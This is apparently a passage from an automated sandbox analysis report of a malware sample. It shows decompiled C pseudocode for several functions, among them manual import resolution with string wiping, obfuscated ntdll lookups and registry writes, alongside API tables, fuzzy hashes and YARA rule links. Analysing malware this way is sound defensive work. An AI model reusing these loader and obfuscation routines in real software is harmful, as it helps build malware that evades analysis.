						_t35 = E00D93D4D(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E00D96555(0, _t35) != 0) {
						_t86 =  *0xd9d324; // 0x4bd95b0
						E00D94FDC(_t86 + 4, _t39);
					}
					HeapFree( *0xd9d238, 0, _t70);
					return 0;
				}
			}

0x00d9a22c
0x00d9a22c
0x00d9a22c
0x00d9a22c
0x00d9a22f
0x00d9a230
0x00d9a231
0x00d9a24b
0x00d9a259
0x00d9a259
0x00d9a25e
0x00d9a278
0x00d9a407
0x00d9a409
0x00d9a27e
0x00d9a27e
0x00d9a27f
0x00d9a282
0x00d9a283
0x00d9a288
0x00d9a29e
0x00d9a28a
0x00d9a28a
0x00d9a297
0x00d9a297
0x00d9a2a8
0x00d9a2aa
0x00d9a2b4
0x00d9a2b9
0x00d9a2b9
0x00d9a2b4
0x00d9a2c0
0x00d9a2d6
0x00d9a2c2
0x00d9a2c2
0x00d9a2cf
0x00d9a2cf
0x00d9a2da
0x00d9a2dc
0x00d9a2e6
0x00d9a2eb
0x00d9a2eb
0x00d9a2e6
0x00d9a2f2
0x00d9a308
0x00d9a2f4
0x00d9a2f4
0x00d9a301
0x00d9a301
0x00d9a30c
0x00d9a30e
0x00d9a318
0x00d9a31d
0x00d9a31d
0x00d9a318
0x00d9a324
0x00d9a33a
0x00d9a326
0x00d9a326
0x00d9a333
0x00d9a333
0x00d9a33e
0x00d9a340
0x00d9a34a
0x00d9a34f
0x00d9a34f
0x00d9a34a
0x00d9a356
0x00d9a36c
0x00d9a358
0x00d9a358
0x00d9a365
0x00d9a365
0x00d9a370
0x00d9a372
0x00d9a37c
0x00d9a381
0x00d9a381
0x00d9a37c
0x00d9a388
0x00d9a39e
0x00d9a38a
0x00d9a38a
0x00d9a397
0x00d9a397
0x00d9a3a2
0x00d9a3a4
0x00d9a3a7
0x00d9a3a8
0x00d9a3af
0x00d9a3b1
0x00d9a3b2
0x00d9a3b2
0x00d9a3af
0x00d9a3b9
0x00d9a3cf
0x00d9a3bb
0x00d9a3bb
0x00d9a3c8
0x00d9a3c8
0x00d9a3d3
0x00d9a3e1
0x00d9a3eb
0x00d9a3eb
0x00d9a3f8
0x00d9a404
0x00d9a404

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A2B0
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A2E2
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A314
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A346
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A378
HeapFree.KERNEL32(00000000,?,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00D92018), ref: 00D9A3F8

Strings

Uxt, xrefs: 00D9A3F8

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: 0c2ace2e5ccb8bb1474297b44636e27cd7f9a1ce6fc53fb219769d2abdacadea
Instruction ID: c878b0f7b75a4712ddf3f55e2510aabb557303af45fd2cef8981ab25e4ef8f52
Opcode Fuzzy Hash: 0c2ace2e5ccb8bb1474297b44636e27cd7f9a1ce6fc53fb219769d2abdacadea
Instruction Fuzzy Hash: 87518372A10204EFDF10EBFCDE88C6F77AEEB887007681916A405D7259EA31DE4097B5

Uniqueness

Uniqueness Score: -1.00%

Function 00511D05, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00511D05(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x00511d0e
0x00511d14
0x00511d19
0x00511d1e
0x00511e1f
0x00511e24
0x00511e24
0x00511d25
0x00511d28
0x00511d2b
0x00511d30
0x00511e1e
0x00000000
0x00511e1e
0x00511d37
0x00511d37
0x00511d3b
0x00511d41
0x00511d46
0x00000000
0x00000000
0x00511d4c
0x00511d5b
0x00511d60
0x00511d62
0x00511d65
0x00511d6a
0x00511d76
0x00511d76
0x00511d79
0x00511d7d
0x00511e03
0x00511e03
0x00511e06
0x00511e09
0x00511e0e
0x00000000
0x00000000
0x00511e1d
0x00000000
0x00511e1d
0x00511d87
0x00511d8a
0x00000000
0x00511d8c
0x00511d8c
0x00511d95
0x00511daa
0x00511dac
0x00511da3
0x00511da3
0x00511da3
0x00511d8e
0x00511d8e
0x00511d8e
0x00511daf
0x00511daf
0x00511db4
0x00511db6
0x00511db6
0x00511dbe
0x00511dc4
0x00511dc9
0x00000000
0x00000000
0x00511dcd
0x00511dcf
0x00511ddd
0x00511de2
0x00511de2
0x00511deb
0x00511dee
0x00511df1
0x00511df5
0x00000000
0x00511df7
0x00511e00
0x00511e00
0x00000000
0x00511e00
0x00511df9
0x00511df9
0x00000000
0x00511df9
0x00511d6c
0x00511d70
0x00000000
0x00000000
0x00000000
0x00511d70
0x00511e16
0x00000000

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?), ref: 00511D3B
lstrlenA.KERNEL32(?), ref: 00511D51
memset.NTDLL ref: 00511D5B
GetProcAddress.KERNEL32(?,00000002), ref: 00511DBE
lstrlenA.KERNEL32(-00000002), ref: 00511DD3
memset.NTDLL ref: 00511DDD

Strings

~, xrefs: 00511E16

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: de7a7b2df7104acd12ab2358f7d9b173bc5f44ec9eaa9e66d11035cc3e4b5181
Instruction ID: d61c1066d21ce5e841aaa0b95b8e281d41fb7560ac613caec03e763b9c974212
Opcode Fuzzy Hash: de7a7b2df7104acd12ab2358f7d9b173bc5f44ec9eaa9e66d11035cc3e4b5181
Instruction Fuzzy Hash: 3431B371A009069BEB10CF54D854AEEBFB5BF44340F1141A8EE01DB240D730EA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00D914E7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D914E7(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00D96D10(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xd9d2a4; // 0x3e3a5a8
					_t1 = _t23 + 0xd9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xd9d2a4; // 0x3e3a5a8
					_t2 = _t26 + 0xd9e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00D945B3(_t54);
					} else {
						_t30 =  *0xd9d2a4; // 0x3e3a5a8
						_t5 = _t30 + 0xd9e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xd9d2a4; // 0x3e3a5a8
							_t7 = _t33 + 0xd9e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xd9d2a4; // 0x3e3a5a8
								_t9 = _t36 + 0xd9e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xd9d2a4; // 0x3e3a5a8
									_t11 = _t39 + 0xd9e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00D93FD7(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00d914f6
0x00d914fa
0x00d915bc
0x00d91500
0x00d91500
0x00d91505
0x00d91518
0x00d9151a
0x00d9151f
0x00d91527
0x00d9152e
0x00d91530
0x00d91535
0x00d915b4
0x00d915b5
0x00d91537
0x00d91537
0x00d9153c
0x00d91544
0x00d91546
0x00d9154b
0x00000000
0x00d9154d
0x00d9154d
0x00d91552
0x00d9155a
0x00d9155c
0x00d91561
0x00000000
0x00d91563
0x00d91563
0x00d91568
0x00d91570
0x00d91572
0x00d91577
0x00000000
0x00d91579
0x00d91579
0x00d9157e
0x00d91586
0x00d91588
0x00d9158d
0x00000000
0x00d9158f
0x00d91595
0x00d9159a
0x00d915a1
0x00d915a6
0x00d915ab
0x00000000
0x00d915ad
0x00d915b0
0x00d915b0
0x00d915ab
0x00d9158d
0x00d91577
0x00d91561
0x00d9154b
0x00d91535
0x00d915ca

APIs

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D949D3,?,?,?,?,00000000,00000000), ref: 00D9150C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D9152E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D91544
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D9155A
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D91570
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D91586

Part of subcall function 00D93FD7: memset.NTDLL ref: 00D94056

Strings

Nxt, xrefs: 00D91512

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: Nxt
API String ID: 1886625739-3788892007
Opcode ID: 088e4ac2d991af98f570772d22e17bfbd36db90aa49f8d49898d6d7d6c8bc564
Instruction ID: 7e5de40851402373cb0d62fab1ff92bedf1c95018697b8651b7b171d9eced462
Opcode Fuzzy Hash: 088e4ac2d991af98f570772d22e17bfbd36db90aa49f8d49898d6d7d6c8bc564
Instruction Fuzzy Hash: 082106B560074BAFDB61EFA9C944D6AB7FCEF443007064566A50ACB351EA70E9058FB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D969CF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00D969CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xd9d2a4; // 0x3e3a5a8
				_t1 = _t9 + 0xd9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00D92372(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x4bd95b1
					_t41 = E00D96D10(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00D940C2(_t34, _t41, _a8);
						E00D945B3(_t41);
						_t42 = E00D96747(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00D945B3(_t36);
							_t36 = _t42;
						}
						_t43 = E00D92070(_t36, _t33);
						if(_t43 != 0) {
							E00D945B3(_t36);
							_t36 = _t43;
						}
					}
					E00D945B3(_t28);
				}
				return _t36;
			}

0x00d969cf
0x00d969d2
0x00d969d3
0x00d969db
0x00d969e2
0x00d969e9
0x00d969ed
0x00d969f3
0x00d969fa
0x00d969ff
0x00d96a07
0x00d96a11
0x00d96a15
0x00d96a19
0x00d96a1f
0x00d96a24
0x00d96a34
0x00d96a36
0x00d96a4d
0x00d96a51
0x00d96a54
0x00d96a59
0x00d96a59
0x00d96a62
0x00d96a66
0x00d96a69
0x00d96a6e
0x00d96a6e
0x00d96a66
0x00d96a71
0x00d96a71
0x00d96a7c

APIs

Part of subcall function 00D92372: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00D969E9,253D7325,00000000,00000000,00000000,?,?,00D988FB), ref: 00D923D9
Part of subcall function 00D92372: sprintf.NTDLL ref: 00D923FA

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,?,00D988FB,?,04BD95B0), ref: 00D969FA
lstrlen.KERNEL32(?,?,?,00D988FB,?,04BD95B0), ref: 00D96A02

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

strcpy.NTDLL ref: 00D96A19
lstrcat.KERNEL32(00000000,?), ref: 00D96A24

Part of subcall function 00D940C2: lstrlen.KERNEL32(?,?,00D988FB,00D988FB,00000001,00000000,00000000,?,00D96A33,00000000,00D988FB,?,?,00D988FB,?,04BD95B0), ref: 00D940D9

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00D988FB,?,?,00D988FB,?,04BD95B0), ref: 00D96A41

Part of subcall function 00D96747: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00D96A4D,00000000,?,?,00D988FB,?,04BD95B0), ref: 00D96751
Part of subcall function 00D96747: _snprintf.NTDLL ref: 00D967AF

Strings

=, xrefs: 00D96A3B

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 25d473117d79b9f63d1fa807bc47b2db97109fa41a683fee88b8a8d1d5ba4a5a
Instruction ID: 890076c510fc751986cd69ba767f901c06418a249e0022b2ad3b9d5720cd2df4
Opcode Fuzzy Hash: 25d473117d79b9f63d1fa807bc47b2db97109fa41a683fee88b8a8d1d5ba4a5a
Instruction Fuzzy Hash: 36117073A012257B4F12BBB49D85D6F3AADDE857A43094016F608EB202DE74DD0287F4

Uniqueness

Uniqueness Score: -1.00%

Function 00D93BFB, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00D93C55
SysAllocString.OLEAUT32(0070006F), ref: 00D93C69
SysAllocString.OLEAUT32(00000000), ref: 00D93C7B
SysFreeString.OLEAUT32(00000000), ref: 00D93CE3
SysFreeString.OLEAUT32(00000000), ref: 00D93CF2
SysFreeString.OLEAUT32(00000000), ref: 00D93CFD

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a04b322f4d2e09651e30e148f7eed80c77aa0fb7b2f605d3b3ba424fa2df5baf
Instruction ID: 82a85e37746ef0d80156bf0744f0f34a74404805336d048ca7345961dcde30f4
Opcode Fuzzy Hash: a04b322f4d2e09651e30e148f7eed80c77aa0fb7b2f605d3b3ba424fa2df5baf
Instruction Fuzzy Hash: 33414235900A09AFDF01DFB8D84569FB7BAEF49300F144466E915FB220DA72DE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D98C1A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00D98C1A(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xd9d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E00D9A5A3(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00D99135(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00D945B3(_a8);
						goto L29;
					}
					_t65 =  *0xd9d2a4; // 0x3e3a5a8
					_t16 = _t65 + 0xd9e8cb; // 0x65696c43
					_t68 = E00D9A5A3(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00d9c0
						if(E00D93D94( *_t33, _t96, _a8,  *0xd9d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xd9d2a4; // 0x3e3a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xd9ea42; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xd9ea3d; // 0x55434b48
								_t73 = _t34;
							}
							if(E00D94118( &_a24, _t73,  *0xd9d334,  *0xd9d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xd9d2a4; // 0x3e3a5a8
									_t44 = _t75 + 0xd9e856; // 0x74666f53
									_t78 = E00D9A5A3(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00d9c0
										E00D9407F( *_t47, _t96, _a8,  *0xd9d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d00d9c0
										E00D9407F( *_t49, _t96, _t103,  *0xd9d330, _a16);
										E00D945B3(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00d9c0
									E00D9407F( *_t40, _t96, _a8,  *0xd9d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d00d9c0
									E00D9407F( *_t43, _t96, _a8,  *0xd9d330, _a16);
								}
								if( *_t105 != 0) {
									E00D945B3(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00d9c0
					if(E00D9424B( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00d9c0
							E00D93D94( *_t26, _t96, _a8, _a24, _t104);
						}
						E00D945B3(_t104);
						_t102 = _a16;
					}
					E00D945B3(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xd9d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00d98c1a
0x00d98c23
0x00d98c2a
0x00d98c2f
0x00d98c9e
0x00d98ca4
0x00d98ca9
0x00d98cb2
0x00d98cb7
0x00d98cbc
0x00d98e30
0x00d98e37
0x00d98e37
0x00d98e3c
0x00d98e3e
0x00d98e3e
0x00d98e47
0x00d98e47
0x00d98cc2
0x00d98cce
0x00d98e26
0x00d98e29
0x00000000
0x00d98e29
0x00d98cd4
0x00d98cd9
0x00d98ce2
0x00d98ce7
0x00d98cec
0x00d98d36
0x00d98d36
0x00d98d49
0x00d98d53
0x00d98d59
0x00d98d60
0x00d98d6a
0x00d98d6a
0x00d98d62
0x00d98d62
0x00d98d62
0x00d98d62
0x00d98d8c
0x00d98d94
0x00d98dc2
0x00d98dc7
0x00d98dd0
0x00d98dd5
0x00d98dd9
0x00d98e0b
0x00d98ddb
0x00d98de8
0x00d98deb
0x00d98dfb
0x00d98dfe
0x00d98e04
0x00d98e04
0x00d98d96
0x00d98da3
0x00d98da6
0x00d98db8
0x00d98dbb
0x00d98dbb
0x00d98e15
0x00d98e21
0x00d98e17
0x00d98e1a
0x00d98e1a
0x00d98e15
0x00d98d8c
0x00000000
0x00d98d53
0x00d98cfb
0x00d98d05
0x00d98d07
0x00d98d0c
0x00d98d10
0x00d98d12
0x00d98d1d
0x00d98d20
0x00d98d20
0x00d98d26
0x00d98d2b
0x00d98d2b
0x00d98d31
0x00000000
0x00d98d31
0x00d98c34
0x00000000
0x00d98c5b
0x00d98c66
0x00d98c7c
0x00d98c82
0x00d98c8a
0x00000000
0x00d98c8a

APIs

StrChrA.SHLWAPI(00D981E5,0000005F,00000000,00000000,00000104), ref: 00D98C4D
memcpy.NTDLL(?,00D981E5,?), ref: 00D98C66
lstrcpy.KERNEL32(?), ref: 00D98C7C

Part of subcall function 00D9A5A3: lstrlen.KERNEL32(?,00000000,00D9D330,00000001,00D9453C,00D9D00C,00D9D00C,00000000,00000005,00000000,00000000,?,?,?,00D9857A,?), ref: 00D9A5AC
Part of subcall function 00D9A5A3: mbstowcs.NTDLL ref: 00D9A5D3
Part of subcall function 00D9A5A3: memset.NTDLL ref: 00D9A5E5

Part of subcall function 00D9407F: lstrlenW.KERNEL32(00D981E5,?,?,00D98DF0,3D00D9C0,80000002,00D981E5,00D982F9,74666F53,4D4C4B48,00D982F9,?,3D00D9C0,80000002,00D981E5,?), ref: 00D9409F

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

lstrcpy.KERNEL32(?,00000000), ref: 00D98C9E

Strings

\, xrefs: 00D98C82

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 5555c2c70b102c5877d3fbf7d07730ad29c677c90168afb10a5e94cb0fc9e704
Instruction ID: 646b86652e33ed7177a232613f6f42a2c6f82ae9d06195b55e093de436ff6102
Opcode Fuzzy Hash: 5555c2c70b102c5877d3fbf7d07730ad29c677c90168afb10a5e94cb0fc9e704
Instruction Fuzzy Hash: D0516B7250020AEFCF21AFA0DD41EAA77BAFF05700F048516FA1597161EB32DD25AB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D94FDC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D94FDC(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xd9d324; // 0x4bd95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xd9d324; // 0x4bd95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xd9d030) {
					HeapFree( *0xd9d238, 0, _t8);
				}
				_t14[1] = E00D9A5F5(_v0, _t14);
				_t11 =  *0xd9d324; // 0x4bd95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00d94fdc
0x00d94fdc
0x00d94fe5
0x00d94ff5
0x00d94ff5
0x00d94ffa
0x00d94fff
0x00000000
0x00000000
0x00d94fef
0x00d94fef
0x00d95001
0x00d95005
0x00d95017
0x00d95017
0x00d95027
0x00d9502a
0x00d9502f
0x00d95033
0x00d95039

APIs

RtlEnterCriticalSection.NTDLL(04BD9570), ref: 00D94FE5
Sleep.KERNEL32(0000000A,?,?,?,00D92018,?,?,?,4D283A53,?,?), ref: 00D94FEF
HeapFree.KERNEL32(00000000,00000000,?,?,?,00D92018,?,?,?,4D283A53,?,?), ref: 00D95017
RtlLeaveCriticalSection.NTDLL(04BD9570), ref: 00D95033

Strings

Uxt, xrefs: 00D95017

Memory Dump Source

